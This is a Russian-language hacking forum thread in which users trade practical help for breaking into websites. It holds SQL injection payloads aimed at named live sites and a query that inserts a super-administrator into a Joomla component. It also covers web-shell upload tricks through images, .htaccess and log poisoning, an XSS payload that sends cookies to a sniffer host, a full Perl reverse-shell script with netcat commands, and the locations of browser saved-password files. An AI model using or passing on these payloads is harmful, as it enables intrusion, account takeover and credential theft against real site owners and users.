HTML не имеет доступа к файловой системе.

mailbrush
06.08.2009, 13:33
Фильтрует именно ">? Или " и > по очереди?

Ctacok
06.08.2009, 22:04
Узнал таблицу,поля,столбцы.
По запросу

Выдаёт ошибку.
Что не так?
Так же пробовал
Limit, потом может быть addslashes.
union+здесь кол-во полей и т.п. +concat_ws(0x3b,user_name,password,email)+from+adm in_user+limit+1,1+--+

HAXTA4OK
06.08.2009, 23:06
не думал что она просто закрыта?

Jokester
06.08.2009, 23:11
не думал что она просто закрыта?
На ключ?

DeluxeS
https://forum.antichat.ru/thread104591.html
Вопрос №3

Damnating
07.08.2009, 01:20
site.com/request_list.asp?action=view&id=111814+and+1=(select+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(select+top+1+table_name+from+infor mation_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?

ILYAtirtir
07.08.2009, 01:48
Ты для union select кол-во колонок подбирал?

Ctacok
07.08.2009, 10:57
site.com/request_list.asp?action=view&id=111814+and+1=(select+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(select+top+1+table_name+from+infor mation_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?
1' or 1=@@version
или
1 or 1=@@version

http://injection.rulezz.ru/MSSQL-Injection.html
На почитай.

dya8oll
07.08.2009, 12:41
Добрый день!У меня вопрос по голосованию на этом сайте http://www.pervouralsk.ru/partyzanky/
Голосание проходит,один логин один голос.Но у некоторых уже почти 1000,как это можно реализовать????я регистрировал сам акки,но это очень долго и муторно.ПОдскажи как можно???если возможно то накрутите за Салацкую Марию!

.Striker
07.08.2009, 15:34
есть шелл на сайте, в конфигах нашол пасс от sql рута.
Как через sql рута поднять права на шелле?

mailbrush
07.08.2009, 15:45
SQL Root - Это SQL Root, но не линуксовый.
С его помощью права на серваке не поднимешь (только в SQL).

razb
07.08.2009, 15:54
есть шелл на сайте, в конфигах нашол пасс от sql рута.
Как через sql рута поднять права на шелле?
Пробуй пасс к ssh, ftp, etc. вдруг повезет ))

Ctacok
07.08.2009, 16:52
Где можно взять исходники PHP ?
Т.е. серверной части.
ps
НЕ СКРИПТЫ И НЕ ДВИЖКИ.
А бинарки или как там это.

Qwazar
07.08.2009, 16:56
http://www.php.net/downloads.php

-JC-
08.08.2009, 03:21
Зачем клеить? Может просто код в картинку записать? Если да, то через WinHex затирай последние байты FF D9 и пиши код. Потом эти байты в конце допишешь.

Ershik
08.08.2009, 09:03
AddType application/x-httpd-php .jpg - добавить в .htaccess на сервере.

и будет исполнение jpg как php файла

Ershik
08.08.2009, 09:39
DeluxeS, подробнее.
Ты шелл хочешь залить? через какую систему?

HAXTA4OK
08.08.2009, 10:27
короче если ты хочеш залить шелл через картинку то тебе нужно залить еще один файл - .htaccess, если ты его не можеш залить тогда у тебя шелл в картинке не будет исполнятся

PaCo
08.08.2009, 10:35
да. самописная вроде.
Админка:
1)поддерживаются картинки .jpg & .jpeg
2)возможно редактирование новостей - пока осматриваюсь.
2 варианта
upd: Можно вставить строчку пхп кода.. include() ?
Если есть возможность подлить картинку и тем более потом ее проинклюдить ни вижу проблемы, выполнить php код можно в инклюде - если включены соответствующие враперы под это дело - php:// и т.д. - но легче уже удаленные файл проинклюдить если опять таки allow_url_include <=5 или allow_url_fopen >5.

Ctacok
08.08.2009, 11:26
да. самописная вроде.
Админка:
1)поддерживаются картинки .jpg & .jpeg
2)возможно редактирование новостей - пока осматриваюсь.
2 варианта
upd: Можно вставить строчку пхп кода.. include() ?
shell.jpg.php

DIEZalok
08.08.2009, 12:18
DeluxeS
[x] Пробуй пароль от админки к ftp/ssh.
[x] Ищи уязвимости на соседних сайтах (ReverseIP), если найдешь LFI, то сможешь проинклюдить и картинку.
[x] Не любую фильтрацию можно обойти, но пробуй по-разному: file.php3.jpg, file.php.jpg.phtml и т.д... Попробуй с %00 поиграться.

PaCo
08.08.2009, 12:19
Не выходит ;( А постом выше не понял ((
ну а что тут понимать, судя по вашему посту у вас есть возможность ИЗМЕНИТЬ ЗНАЧЕНИЯ КОТОРОЕ ПОДСТАВЛЯТЬСЯ В include(а именно это как я понял есть судя по "upd: Можно вставить строчку пхп кода.. include() ?") и есть возможность загрузить картинку(и это судя по всему есть судя по "поддерживаются картинки .jpg & .jpeg "), вызываем где нибудь error - смотрим путь(ну или пользуемься относительными путями если в инклюде что присутствует e.g. - ../../image.jpeg), далее загружаем картинку и при условии что она сохраняется в ФС инклюдим ее.
Если загружаемую картинку проверяют тупа по mime-type отсылаемому браузером и расширения без проверки самого содержимого - просто переименовываем шелл в картинку - был shell.php стал shell.jpeg, если же с картинкой проводятся какие то операции(определяеться размер например) и если выполнения этих операций зависит будет ли картинка скопирована - открываем в NOTEPAD++ картинку поменьше размером и без <? <?php ?> в содежимом - вставляем в конце php код какой нам надо(не обязательно тупа шелл - можно какой то аплоудер), не факт что картинка не побьеться, далее загружаем картинку и инклюдим, все это описывалось такое количество раз что я просто не пойму что вам не понятно :).

DeepXhadow
08.08.2009, 14:52
Есть слепая скуля без выводимых полейhttp://mirsauni.ru/?cid=4+OR+id=IF(ascii(substring((select+TABLE_NAME +from+INFORMATION_SCHEMA.TABLES+LIMIT+17,1),1,1))>0,889999999999,BENCHMARK(9999999,MD5(NOW())))--

Все ок,работает.Не понятно только почему cid=4+OR+id=IF (нашел опытным путем) ,а не cid=4+OR+сid=IF (так не работет). Ну да ладно...

Хотелось бы избавится от BENCHMARK'a, т. к. с ним выуживать таблы я 100 лет буду.Вар-ты типа
IF(ASCII(SUBSTRING((SELECT VERSION()),1,1) =5,'1','0')
find_in_set(substring((SELECT VERSION()),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

не катят, думаю что из-за кавычек в запросах. Кодирую кавычку в HEX - все равно 0 рез-тат.

Задача осложяется тем, что к примеру на 2 идентичные запроса ?cid=4 из БД будет вытащена разная инфа (какой-нить RANDOM() стоит).

Кто хочет поковырять, велком 10115695. У меня уже мозг кипит.

DimOnOID
08.08.2009, 14:58
http://mirsauni.ru/?cid=4 OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,(SELECT 1 UNION SELECT 2))--
http://mirsauni.ru/?cid=4 OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=1000,1,(SELECT 1 UNION SELECT 2))--
Например Скрипт (http://forum.antichat.ru/showpost.php?p=894169&postcount=5) Грея умеет работать с море ван роу..(Хотя если правильно настроить сгодитцо и bsqlbf, и т.д)

mailbrush
08.08.2009, 15:12
DeepXhadow, юзай сипт :)

Qwazar
08.08.2009, 15:16
Посмотри вот эти темы:

https://forum.antichat.ru/thread119047.html
https://forum.antichat.ru/thread35207.html

В первой скачай скрипты, они работают без кавычек. Попробуй.

Есть слепая скуля без выводимых полей

Все ок,работает.Не понятно только почему cid=4+OR+id=IF (нашел опытным путем) ,а не cid=4+OR+сid=IF (так не работет). Ну да ладно...

Хотелось бы избавится от BENCHMARK'a, т. к. с ним выуживать таблы я 100 лет буду.Вар-ты типа
IF(ASCII(SUBSTRING((SELECT VERSION()),1,1) =5,'1','0')
find_in_set(substring((SELECT VERSION()),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')

не катят, думаю что из-за кавычек в запросах. Кодирую кавычку в HEX - все равно 0 рез-тат.

Задача осложяется тем, что к примеру на 2 идентичные запроса ?cid=4 из БД будет вытащена разная инфа (какой-нить RANDOM() стоит).

Кто хочет поковырять, велком 10115695. У меня уже мозг кипит.

DeepXhadow
08.08.2009, 15:56
В 4 сипте у меня на вкладке Бтурфорс аттак метод More1Row неактивен...
fast_in_set.php попробывал , просто так с налету не получилось ,буду думать в чем там дело
php SQL.php http://mirsauni.ru:80/?cid= TABLE_NAME INFORMATION_SCHEMA.TABLES 17

Всем большое спасибо за ответы!!!

Qwazar
09.08.2009, 00:27
Пробуй veryfast.php, его поидее и затачивать не надо.

+++AndreyDevil+++
09.08.2009, 18:48
Есть форум...
булка, vBulletin 3.7.1
в нем xss
http://seclists.org/fulldisclosure/2008/Jun/0262.html

делаю так

http://localhost/vBull_3/vBull_3.7.1_/vBulletin%203.7.1/upload/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW 1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21p bGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K

в base64, такой код

<script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__2166.gif?"+document.cookie; </script>

все это делается на локалхосте, мну перекидывает

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW 1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21p bGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K

бегу на сниффер, там только ip и браузер, собственно вопрос, а где куки? :D

Spyder
09.08.2009, 20:20
+union+select+1,2,3,concat_ws(0x3b,id,user,passwor d),5+from+users+limit+n,1
n- номер юзера начиная с нуля

SkyFox
09.08.2009, 22:50
XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.

<img src="javascript:img = new Image(); img.src='адрес_к_моему_снифферу ';" >

Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается.

FAQ666
10.08.2009, 00:27
Вообщем такая проблема:
Ввожу этот запрос в MysqlFront все работает создает запись, а если выполняется из кода скрипта то нифига не добавляет, по логам Mysql смотрел запрос проходит как надо но ничего не создает. в чем может проблема быть?
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `language` WHERE `langValue` IN('a');INSERT INTO`usr`(`id`,`name`,`username`,`password`,`usert ype`)VALUES('123','administrator','admin123','1111 ','adm')# a') AND `sobi2Section` = 'field_opt'

DimOnOID
10.08.2009, 00:59
Может быть лучше выложить..этот код php скрипта?

FAQ666
10.08.2009, 01:11
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml

http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid=26
в поиск ввести
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt' Поубирать пробелы надо обяательно

Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'

-JC-
10.08.2009, 03:13
Не удалось найти файл, соответствующий указанному идентификатору сессии.

PaCo
10.08.2009, 10:56
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml

http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid=26
в поиск ввести
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt' Поубирать пробелы надо обяательно

Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.

SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`, `usertype`)VALUES('123','administrtor','admin123', '1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
mysql_query - выполняет один запрос за раз и не более.

FAQ666
10.08.2009, 11:01
Спасибо. Тогда остается только BENCHMARK()

PaCo
10.08.2009, 11:07
Спасибо. Тогда остается только BENCHMARK()
Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?

FAQ666
10.08.2009, 11:22
Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?
Нет вывода)
Компонент популярный запощу в уязвимости)

Qwazar
10.08.2009, 11:28
Спасибо. Тогда остается только BENCHMARK() Вывода ошибки тоже нет? И страницы совсем никак не отличаются?

FAQ666
10.08.2009, 11:30
Вывода ошибки тоже нет? И страницы совсем никак не отличаются?\
Да)

PaCo
10.08.2009, 11:51
Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:

if ($database->getErrorNum()) {
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
}

можно попробывать more one row, правда сам не смотрел.

FAQ666
10.08.2009, 12:15
Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:

if ($database->getErrorNum()) {
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
}

можно попробывать more one row, правда сам не смотрел. Напиши запрос полностью а то непоймучто ты предлагаешь)

Jokester
10.08.2009, 12:18
Напиши запрос полностью а то непоймучто ты предлагаешь)

Давай-ка ты сначала нормально разберёшься, а потом будешь постить это в уязвимости джумлы.

Ни кода, ни примера, ни версии, нифига нет. Это не баг, а хрен знает что. Или отредактируй пост нормально, или я его снесу. Разберёшься выложишь
Вывода нету и не слепая
Это что вообще должно означать по твоему?!

JOHNik
11.08.2009, 00:19
XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.

<img src="javascript:img = new Image(); img.src='адрес_к_моему_снифферу ';" >

Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается.
Найди в своем сниффере файл config.php и обрати внимание на строчку "$image_filename = "ПУТЬ К КАРТИНКЕ";

Explоit
11.08.2009, 01:37
Почему на всех моих веб шеллах не открвается порт для конекта нетката?

И подскажите как юзать неткат в режиме backconnect через дедик



ЗЫ один мембер зашол в тему и ущол ((

Pashkela
11.08.2009, 01:53
Возможно на всех серваках, где твои шеллы - фаер, или, что более вероятно, ты пытаешься юзать встроенный в шелл бекконект, что говорит лишь о том, что у тебя паблик шелл, где, как правило, встроенный бекконект работает некорректно. Если же ты юзаешь шелл, написанный одним из участников форума, то задавай соотвествующие вопросы там, где тема про его шелл

ЗЫЖ А еще, возможно, ты просто не умеешь пользоваться неткатом.

Что еще можно ответить на вопрос, в котором "море" нужной инфы - что делал, какой шелл юзал, на какой системе, под какими ограничениями хотя бы визуальными, как неткат запускал и т.д. и т.р.с.п.

Explоit
11.08.2009, 01:58
Возможно на всех серваках, где твои шеллы - фаер, или, что более вероятно, ты пытаешься юзать встроенный в шелл бекконект, что говорит лишь о том, что у тебя паблик шелл, где, как правило, встроенный бекконект работает некорректно. Если же ты юзаешь шелл, написанный одним из участников форума, то задавай соотвествующие вопросы там, где тема про его шелл

ЗЫЖ А еще, возможно, ты просто не умеешь пользоваться неткатом.

Что еще можно ответить на вопрос, в котором "море" нужной инфы - что делал, какой шелл юзал, на какой системе, под какими ограничениями хотя бы визуальными, как неткат запускал и т.д. и т.р.с.п.

linux, шелл орбовский. запускал так nc.exe sitename 777

в шелле сделал всё проавильно.

ЗЫ какой шелл для таких целей порекомендуешь?

Давай я тебе в ПМ скину список щеллов и ты их потестиш?

Pashkela
11.08.2009, 02:13
Не, не надо, уже были преценденты, плохо кончалось. Лучше вот, пройди в тему автора и задай там свой вопрос:

https://forum.antichat.ru/thread103155.html


nc.exe sitename 777


O_o

Twoster
11.08.2009, 07:03
Почему на всех моих веб шеллах не открвается порт для конекта нетката?
И подскажите как юзать неткат в режиме backconnect через дедик
Лучше юзай просто бекконект? Например такой:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Еще у тебя на дедике должен быть так называемый "белый IP", далее ты запускаешь на сервере вышеприведенный скрипт, а на дедике nc.exe -l -v -p 443, еще может быть решением проблемы бекконект на 80 порт, либо 443.
А еще лучше под эти цели юзать не дедик, а vds например, конектишься по ссш, и там открываешь неткат ./nc -l -v -p 443

.Slip
11.08.2009, 10:12
linux, шелл орбовский. запускал так nc.exe sitename 777

в шелле сделал всё проавильно.

ЗЫ какой шелл для таких целей порекомендуешь?

Давай я тебе в ПМ скину список щеллов и ты их потестиш?
Насколько я помню, открытие порта до 1024 требует прав рута, но это не точно, подзабыл. Попробуй 33333 хотя бы.

borntobebad
11.08.2009, 19:18
http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum

z00MAN
11.08.2009, 19:27
http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
тут не блинд
http://caryscars.be/index.php?item=details&id=-150+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,ver sion(),15,16--

borntobebad
11.08.2009, 19:50
a pochemu split4 ne naxodit pole vvoda ?

borntobebad
11.08.2009, 19:53
razobralsa . Split4 pashit .

noozike69
11.08.2009, 21:54
может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???

xa-xa89
11.08.2009, 22:00
в Mozilla formhistory.sqlite вроде как....

z00MAN
11.08.2009, 23:15
может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
Opera хранит пароли в wand.dat
Firefox - в файле signons3.txt , для расшифровки нужен файл key3.db. Оба файла находятся в профиле

RazyKK
12.08.2009, 02:46
как через mysql inj выполнить php код,если могу добовлять записи в бд,но они фильтруются.добовляю <?system(ls);?>
вот что добовляется в бд &lt;?system(ls);?&gt;.
Ну и при выводе не выполняется.Можн какнить сделать?

Pashkela
12.08.2009, 02:49
<?system(ls);?> перевести в хекс вида 0x...

только код ты так все-равно не выполнишь, надо слить в файл сначала

into outfile '/абсолютный_путь/имя_файла'

RazyKK
12.08.2009, 02:55
into outfile '/абсолютный_путь/имя_файла' там вроде нету прав на запись файлов

Pashkela
12.08.2009, 03:01
1. Внимательно прочитай всё - http://forum.antichat.ru/thread104591.html
2. "ам вроде нету прав на запись файлов" - непонятно, что ты имел в виду под этим, если читаешь файло, значит file_priv=Y, второе - ищи папку доступную на запись

ЗЫЖ Тьфу, ёпт, ты просто из админки что ли добаваляешь типо название темы, и оно пишется в БД? Ничего ты не сделаешь, ищи другой способ

mr.gr33n
12.08.2009, 03:12
2Pashkela, он через скуль как я понял заливает файл into outfile )))

2RazyKK,выполнить пхп файл путём load_file не выйдет, или заливай в tmp находи инклуд и инклудь шелл )

RazyKK
12.08.2009, 03:19
mr.gr33n кароч я добовляю запись в бд а вывод через union select.

mr.gr33n
12.08.2009, 03:24
т.е. заливаешь файлик? или редактируешь данные бд ?
чет я не въеду малость))

RazyKK
12.08.2009, 03:29
редактирую,тип в профиле icq или любое др поле

mr.gr33n
12.08.2009, 03:31
не выполнится он так (((
разве что только xss )

RazyKK
12.08.2009, 03:33
угу сопру куки админа,когда есть доступ к бд форума)))

mr.gr33n
12.08.2009, 03:40
Ну дык я не говорю что куки тащить надо, просто говорю что пхп код не выполнится таким макаром, только html )

RazyKK
12.08.2009, 04:51
нашел файл логов через php incl,в reffer вставил
http://www.site<?php system(ls); ?>site.com/index.php
вылазит ошибка Parse error: syntax error, unexpected T_STRING что не так?

xa-xa89
12.08.2009, 04:53
http://www.site<?php system('ls'); ?>site.com/index.php
вроде так должно быть

RazyKK
12.08.2009, 05:04
испортил логи терь над ждать пока ошибка исчезнет)

u36a
12.08.2009, 13:06
Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>

Какие есть способы залить шел?

okthxnz
12.08.2009, 13:08
Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
нашол обменник
и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
Кто нить вкурсах что это было?

L I G A
12.08.2009, 13:25
Какие есть способы залить шел?
пробуй shell.php.flv

Qwazar
12.08.2009, 13:42
испортил логи терь над ждать пока ошибка исчезнет) Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет: <?php
system('dir');
die();/*
<?php
system(;
?>
Ругается конечно, но работает.

u36a
12.08.2009, 14:25
пробуй shell.php.flv

А что это даст, он же не будет интерпретироваться как пхп..

[Raz0r]
12.08.2009, 14:47
А что это даст, он же не будет интерпретироваться как пхп..
Если апач с mod_mime, то будет

u36a
12.08.2009, 14:59
']Если апач с mod_mime, то будет

хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

Ладно, буду пробывать, спасибо за эту инфу.

PaCo
12.08.2009, 15:00
']Если апач с mod_mime, то будет
Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать.

Qwazar
12.08.2009, 15:28
Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать. Наоборот, хендлер для .flv НЕ должен быть прописан.

RazyKK
12.08.2009, 16:01
записал в лог <?php system($_GET[cmd]); ?> хотел копировать в tmp а потом уже инклудить,но опять ошибка))
Parse error: syntax error, unexpected '['
как это закомментировать?

Qwazar
12.08.2009, 16:06
Пиши в лог <?php system($_GET[cmd]);/* Но лучше вместо system - eval, он заработает, если system запрещён.

RazyKK
12.08.2009, 16:11
уже пробовал eval ,undefind function
system не запрещен,в логе ls уже выполнилось

mailbrush
12.08.2009, 19:51
Попробуй exec вместо eval.

Scipio
12.08.2009, 20:07
хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

Ладно, буду пробывать, спасибо за эту инфу.
это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом